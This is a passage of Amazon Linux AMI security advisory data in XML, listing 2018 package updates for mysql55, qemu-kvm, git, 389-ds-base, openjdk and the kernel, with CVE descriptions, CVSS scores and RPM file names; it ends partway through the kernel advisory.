arch="i686"><filename>Packages/mysql56-debuginfo-5.6.40-1.29.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.40-1.29.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.40-1.29.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.40-1.29.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.40-1.29.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.40-1.29.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.40-1.29.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.40-1.29.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.40-1.29.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.40-1.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1028</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1028: medium priority package update for mysql55</title><issued date="2018-05-25 18:26:00" /><updated date="2018-05-29 23:15:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-2819:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568956:
CVE-2018-2819 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2818:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server : Security : Privileges). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568955:
CVE-2018-2818 mysql: Server : Security : Privileges unspecified vulnerability (CPU Apr 2018)
CVE-2018-2817:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568954:
CVE-2018-2817 mysql: Server: DDL unspecified vulnerability (CPU Apr 2018)
CVE-2018-2813:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).
1568951:
CVE-2018-2813 mysql: Server: DDL unspecified vulnerability (CPU Apr 2018)
CVE-2018-2781:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568942:
CVE-2018-2781 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2018)
CVE-2018-2773:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.1 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568932:
CVE-2018-2773 mysql: Client programs unspecified vulnerability (CPU Apr 2018)
CVE-2018-2771:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Locking). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568931:
CVE-2018-2771 mysql: Server: Locking unspecified vulnerability (CPU Apr 2018)
CVE-2018-2761:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).
1568924:
CVE-2018-2761 mysql: Client programs unspecified vulnerability (CPU Apr 2018)
CVE-2018-2755:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.0 Base Score 7.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1568921:
CVE-2018-2755 mysql: Server: Replication unspecified vulnerability (CPU Apr 2018)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2755" title="" id="CVE-2018-2755" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2761" title="" id="CVE-2018-2761" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2771" title="" id="CVE-2018-2771" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2773" title="" id="CVE-2018-2773" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2781" title="" id="CVE-2018-2781" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2813" title="" id="CVE-2018-2813" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2817" title="" id="CVE-2018-2817" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2818" title="" id="CVE-2018-2818" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2819" title="" id="CVE-2018-2819" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55-bench" version="5.5.60" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.60-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.60" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.60-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.60" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.60-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.60" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-config-5.5.60-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.60" release="1.21.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.60-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.60" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.60-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.60" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.60-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.60" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.60-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.60" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.60-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.60" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.60-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.60" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.60-1.21.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.60" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.60-1.21.amzn1.i686.rpm</filename></package><package name="mysql-config" version="5.5.60" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-config-5.5.60-1.21.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.60" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.60-1.21.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.60" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.60-1.21.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.60" release="1.21.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql55-bench-5.5.60-1.21.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.60" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.60-1.21.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.60" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.60-1.21.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.60" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.60-1.21.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.60" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.60-1.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1034</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1034: important priority package update for qemu-kvm</title><issued date="2018-06-08 18:29:00" /><updated date="2018-06-11 21:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-7858:
Quick Emulator (aka QEMU), when built with the Cirrus CLGD 54xx VGA Emulator support, allows local guest OS privileged users to cause a denial of service (out-of-bounds access and QEMU process crash) by leveraging incorrect region calculation when updating VGA display.
1553402:
CVE-2018-7858 QEMU: cirrus: OOB access when updating VGA display
CVE-2018-5683:
An out-of-bounds read access issue was found in the VGA emulator of QEMU. It could occur in the vga_draw_text routine while updating the display area for a VNC client. A privileged user inside a guest could use this flaw to crash the QEMU process, resulting in DoS.
1530356:
CVE-2018-5683 Qemu: Out-of-bounds read in vga_draw_text routine
CVE-2018-3639:
An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load &amp; Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor&#039;s data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks.
1566890:
CVE-2018-3639 hw: cpu: speculative store bypass
CVE-2017-15268:
A memory leakage issue was found in the I/O channels websockets implementation of the Quick Emulator (QEMU). It could occur while sending screen updates to a client that is slow to read and process them. A privileged guest user could use this flaw to cause a denial of service on the host and/or potentially crash the QEMU process instance on the host.
1496879:
CVE-2017-15268 QEMU: I/O: potential memory exhaustion via websock connection to VNC
CVE-2017-15124:
VNC server implementation in Quick Emulator (QEMU) was found to be vulnerable to an unbounded memory allocation issue, as it did not throttle the framebuffer updates sent to its client. If the client did not consume these updates, VNC server allocates growing memory to hold onto this data. A malicious remote VNC client could use this flaw to cause DoS to the server host.
1525195:
CVE-2017-15124 Qemu: memory exhaustion through framebuffer update request message in VNC server
CVE-2017-13711:
A use-after-free issue was found in the Slirp networking implementation of the Quick Emulator (QEMU). It occurs when a socket referenced from multiple packets is freed while responding to a message. A user/process could use this flaw to crash the QEMU process on the host, resulting in denial of service.
1486400:
CVE-2017-13711 QEMU: Slirp: use-after-free when sending response
CVE-2017-13672:
An out-of-bounds read access issue was found in the VGA display emulator built into the Quick Emulator (QEMU). It could occur while reading VGA memory to update the graphics display. A privileged user/process inside a guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service situation.
1486560:
CVE-2017-13672 QEMU: vga: OOB read access during display update
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13672" title="" id="CVE-2017-13672" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13711" title="" id="CVE-2017-13711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15124" title="" id="CVE-2017-15124" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15268" title="" id="CVE-2017-15268" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3639" title="" id="CVE-2018-3639" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5683" title="" id="CVE-2018-5683" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7858" title="" id="CVE-2018-7858" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="qemu-kvm" version="1.5.3" release="156.8.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-1.5.3-156.8.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-tools" version="1.5.3" release="156.8.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-tools-1.5.3-156.8.amzn1.x86_64.rpm</filename></package><package name="qemu-img" version="1.5.3" release="156.8.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-img-1.5.3-156.8.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-debuginfo" version="1.5.3" release="156.8.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-debuginfo-1.5.3-156.8.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-common" version="1.5.3" release="156.8.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-common-1.5.3-156.8.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2018-1035</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1035: important priority package update for git</title><issued date="2018-06-08 18:31:00" /><updated date="2018-06-11 21:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-11235:
In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs &quot;git clone --recurse-submodules&quot; because submodule &quot;names&quot; are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with &quot;../&quot; in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.
1583862:
CVE-2018-11235 git: arbitrary code execution when recursively cloning a malicious repository
CVE-2018-11233:
In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, code to sanity-check pathnames on NTFS can result in reading out-of-bounds memory.
1583888:
CVE-2018-11233 git: path sanity-checks on NTFS can read arbitrary memory
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11233" title="" id="CVE-2018-11233" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11235" title="" id="CVE-2018-11235" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-bzr" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="git" version="2.14.4" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.14.4-2.58.amzn1.x86_64.rpm</filename></package><package name="git-daemon" version="2.14.4" release="2.58.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/git-daemon-2.14.4-2.58.amzn1.x86_64.rpm</filename></package><package name="git-p4" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="gitweb" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.14.4" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.14.4-2.58.amzn1.x86_64.rpm</filename></package><package name="git-debuginfo" version="2.14.4" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.14.4-2.58.amzn1.x86_64.rpm</filename></package><package name="git-daemon" version="2.14.4" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.14.4-2.58.amzn1.i686.rpm</filename></package><package name="git" version="2.14.4" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.14.4-2.58.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.14.4" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.14.4-2.58.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.14.4" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.14.4-2.58.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1036</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1036: important priority package update for 389-ds-base</title><issued date="2018-06-08 18:32:00" /><updated date="2018-06-11 21:31:00" /><severity>important</severity><description>Package updates are available for 
Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1089:
It was found that 389-ds-base did not properly handle long search filters with characters needing escapes, possibly leading to buffer overflows. A remote, unauthenticated attacker could potentially use this flaw to make ns-slapd crash via a specially crafted LDAP request, thus resulting in denial of service.
1559802:
CVE-2018-1089 389-ds-base: ns-slapd crash via large filter value in ldapsearch
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1089" title="" id="CVE-2018-1089" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base" version="1.3.7.5" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.7.5-21.56.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.7.5" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.7.5-21.56.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.7.5" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.7.5-21.56.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.7.5" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.7.5-21.56.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.7.5" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.7.5-21.56.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.7.5" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.7.5-21.56.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.7.5" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.7.5-21.56.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.7.5" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.7.5-21.56.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.7.5" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.7.5-21.56.amzn1.i686.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.7.5" release="21.56.amzn1" epoch="0" 
arch="i686"><filename>Packages/389-ds-base-snmp-1.3.7.5-21.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1037</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1037: important priority package update for java-1.7.0-openjdk</title><issued date="2018-06-08 18:32:00" /><updated date="2018-06-11 21:32:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3639:
An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load &amp; Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that a memory read from an address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor&#039;s data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks.
1566890:
CVE-2018-3639 hw: cpu: speculative store bypass
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3639" title="" id="CVE-2018-3639" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.181-2.6.14.8.80.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.181-2.6.14.8.80.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.181-2.6.14.8.80.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.181-2.6.14.8.80.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.181-2.6.14.8.80.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.181-2.6.14.8.80.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.181-2.6.14.8.80.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.181-2.6.14.8.80.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" 
version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.181-2.6.14.8.80.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.181-2.6.14.8.80.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.181-2.6.14.8.80.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1038</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1038: important priority package update for kernel</title><issued date="2018-06-08 18:33:00" /><updated date="2018-09-06 22:05:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3693:
An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions past a bounds check. The flaw relies on the presence of a precisely-defined instruction sequence in the privileged code and the fact that memory writes occur to an address which depends on an untrusted value. Such writes cause an update into the microprocessor&#039;s data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to influence speculative execution and/or read privileged memory by conducting targeted cache side-channel attacks.
1581650:
CVE-2018-3693 Kernel: speculative bounds check bypass store
CVE-2018-3639:
An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load &amp; Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that a memory read from an address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor&#039;s data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks.
1566890:
CVE-2018-3639 hw: cpu: speculative store bypass
CVE-2018-1120:
